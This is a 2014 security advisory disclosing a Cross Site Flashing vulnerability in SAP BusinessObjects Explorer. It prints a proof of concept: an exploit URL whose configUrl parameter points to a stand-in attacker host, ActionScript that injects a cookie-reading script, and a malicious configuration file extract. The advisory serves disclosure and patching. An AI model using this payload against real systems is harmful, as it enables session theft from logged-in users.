SAP Security Note 1908647 - Cross Site Flashing in BusinessObjects Explorer

2014-10-14T00:00:00
ID SECURITYVULNS:DOC:31160
Type securityvulns
Reporter Securityvulns
Modified 2014-10-14T00:00:00

Description

COMPASS SECURITY ADVISORY

http://www.csnc.ch/en/downloads/advisories.html

Product: BusinessObjects Explorer

Vendor: SAP AG

Subject: Cross Site Flashing

Risk: High

Effect: Remotely exploitable

Author: Stefan Horlacher

Date: 2014-10-10

SAP Security Note: 1908647 [0]

Abstract:

BusinessObjects Explorer is vulnerable against Cross Site Flashing [1] attacks, allowing an attacker to e.g. steal the victim's session. This vulnerability requires the victim to click on a malicious link prepared by the attacker.

Affected:

Vulnerable: SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested: Other versions of BusinessObjects Explorer

Technical Description:

The Flash file suffers from a Cross Site Flashing vulnerability. It is possible to directly load and display the com_businessobjects_polestar_bootstrap.swf Flash file and specify a configUrl. This requires the victim to be logged and the attacker needs to know the /webres/ URL, which is known as soon as the attacker is in possession of valid credentials. The configuration file specified in the configURL parameter may reside on a foreign host. The configuration file itself may contain URLs of further Flash files residing on a foreign domain. If successful, the victim loads foreign Flash files, which leads to Cross Site Flashing. The example below loads a Flash file, which injects JavaScript into the DOM of the originating domain.

URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml


Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml
    package
    {
        import flash.display.Sprite;
        import flash.events.Event;
        import flash.external.ExternalInterface;

        public class Main extends Sprite
        {
            public function Main():void
            {
                ExternalInterface.call("document.write",
                "<script>alert(document.cookie)</script>");
            }
        }
    }

Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:
    <p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"
        p:codebase="plugins/">
    <p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
        p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
    <p:bundles>
        <p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
        <p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>
        <p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>
        <p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>
    [CUT BY COMPASS]

Timeline:

2013-06-06: Discovery by Stefan Horlacher 2013-06-26: Initial vendor notification 2013-12-10: Vendor releases patch and SAP Security Note 1908647 2014-10-10: Disclosure of the advisory

References:

[0] https://service.sap.com/sap/support/notes/1908647 [1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project